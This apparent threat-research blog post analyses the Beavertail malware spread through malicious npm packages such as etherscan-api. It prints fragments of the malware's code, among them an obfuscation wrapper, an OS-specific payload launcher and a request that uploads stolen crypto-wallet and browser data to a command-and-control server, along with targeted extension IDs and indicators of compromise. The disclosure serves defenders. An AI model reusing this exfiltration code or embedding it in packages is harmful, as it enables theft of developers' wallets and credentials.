Tracking Beavertail APT threats in the npm ecosystem

Tracking the movement of known APT groups and the Beavertail malware family into the npm ecosystem.

Engineering

June 12, 2024


The listen.dev research team has recently discovered a concerning APT campaign in which attackers deployed malicious npm packages with highly obfuscated payloads across various CI/CD environments. The attackers exploited the widespread use of open-source libraries, knowing that once injected into a pipeline, such libraries can bypass traditional security defenses. This discovery highlights the increasing risk to development environments and the urgent need for stronger security measures within the software supply chain. Let's dig deeper.

Initial Discovery and Attack Vectors

The Beavertail attack was first identified through the publication of suspicious npm packages:

  • etherscan-api (version 1.3.1)

  • eslint-module-conf (version 2.7.5)

  • eslint-scope-util (version 7.2.3)

All three packages were published by a user named "richard_dev" within a span of 4 days, mimicking legitimate, popular packages to avoid suspicion.

Attack Chain Analysis

The attack-chain diagram accompanying this post shows a multi-stage attack chain, starting from the installation of the compromised npm package and leading to cross-platform persistence and data exfiltration. Let's break down the critical points in the attack flow:

  1. Initial Infection Vector:

    • When the etherscan-api npm package is installed, the malicious code embedded within it is executed.

    • The first step is the deployment of obfuscated JavaScript, which executes without triggering immediate alerts, as seen in the code snippet:

```javascript
// Obfuscator-generated "call once" wrapper: returns a function that runs the
// wrapped callback a single time and then discards it.
const _0x25bb31 = function () {
  let _0x5389c9 = true;
  return function (_0x3f0328, _0x145e0a) {
    const _0x5c31e1 = _0x5389c9 ? function () {
      if (_0x145e0a) {
        const _0x4ecdfd = _0x145e0a.apply(_0x3f0328, arguments);
        _0x145e0a = null;
        return _0x4ecdfd;
      }
    } : function () {};
    _0x5389c9 = false;
    return _0x5c31e1;
  };
}();
```

This obfuscated logic hinders reverse engineering and detection by static code analysis tools.

  2. Cross-Platform Attack Execution:

  • The malicious code performs checks to determine the target operating system (Windows, macOS, Linux).

  • Different payloads are delivered based on the OS. For instance, on Windows, the malware checks for the presence of a local Python interpreter and uses it to execute the payload.

```javascript
// A platform string beginning with "w" selects the Windows branch
if ('w' == _0x5ddb59[0]) {
  if (_0x16fcc2.existsSync(_0x539184 + "\\.pyp\\python.exe")) {
    (() => {
      const _0x1afaee = _0x539184 + "/.npl";
      const _0x41e3a8 = "\"" + _0x539184 + "\\.pyp\\python.exe\" \"" + _0x1afaee + "\"";
      // Execute Windows-specific payload
    })();
  }
} else {
  // Code for Linux/macOS
}
```

  3. Persistence Mechanism:

  • The persistence mechanism relies on a setInterval function that repeatedly executes the payload at 30-second intervals.

```javascript
let _0x169ac3 = setInterval(() => {
  if ((_0x37c2cb += 1) < 5) {
    _0x398711();           // re-run the payload
  } else {
    clearInterval(_0x169ac3); // stop after five attempts
  }
}, 30000);
```

This allows the malware to maintain control over the infected machine without constantly triggering alarms, as it reduces its activity after a set number of attempts.

  4. Data Exfiltration:

  • The malware actively targets browser extensions, especially cryptocurrency wallets like MetaMask and MyEtherWallet. It extracts sensitive data from the target browser extensions, uploading it to a Command-and-Control (C2) server at http://95.164.17.24:1224/uploads.

```javascript
const _0x4b9a51 = {
  url: "http://95.164.17.24:1224/uploads",
  formData: _0x5123da
};
_0xe36215.post(_0x4b9a51, (_0xbd2573, _0x52290f, _0x3f9f49) => {});
```

The malicious npm package used in this attack is called etherscan-api, uploaded by the developer account richard_dev. This package, posing as a legitimate utility, is at the heart of the supply chain compromise. Below is a visual reference of the etherscan-api npm package, showing its recent publication on npm:

  5. Extensions Targeted:

  • MetaMask (nkbihfbeogaeaoehlefnkodbefgpgknn)

  • MyEtherWallet (ibnejdfjmmkpcnlpebklmnkoeoihofec)

  • Brave, Opera, and Firefox browser data are also targeted for exfiltration.

Behavioral Analysis using listen.dev

A detailed review of network activity with the listen.dev tool showed the following connections:

  • Multiple TCP connections to registry.npmjs.org (likely used for additional payload delivery or version checks).

  • Outbound traffic to objects.githubusercontent.com, indicating a possible use of GitHub to host secondary payloads or updates.

  • TCP connections to GitHub via port 443, further suggesting payload hosting or C2 communication.

The following filesystem and process activity was also observed:

  • Unauthorized access to /etc/ssl/openssl.cnf

  • Access attempts to browser directories for Chrome, Brave, Opera, and Firefox

  • Suspicious node processes: node /home/runner/work/.../node_modules/.bin/prebuild-install -r napi

Chronological Attack Flow:

Based on the findings, the key stages in the attack flow are as follows:

  1. Malicious npm Package Installation: The user installs the impacted packages from npm, likely through dependency confusion.

  2. Obfuscated Code Execution: The installed package deploys obfuscated code, evading traditional static analysis.

  3. Platform Identification: The script detects the target platform (Windows/Linux/macOS).

  4. Payload Delivery:

    • On Windows, a .zip file is downloaded, extracted, and executed via Python.

    • On Linux/macOS, the malware downloads a Python script from the C2 server.

  5. Data Exfiltration: The malware targets browser extensions, primarily cryptocurrency wallets, and sends the data to its C2 server.

  6. Persistence: The setInterval loop ensures continuous execution of the malware.

Indicators of Compromise (IoCs)

  • C2 Server IP: 95.164.17.24

  • C2 Server Port: 1224

  • Files Created:

    • Windows: %USERPROFILE%\.pyp\python.exe

    • Linux/macOS: ~/.npl
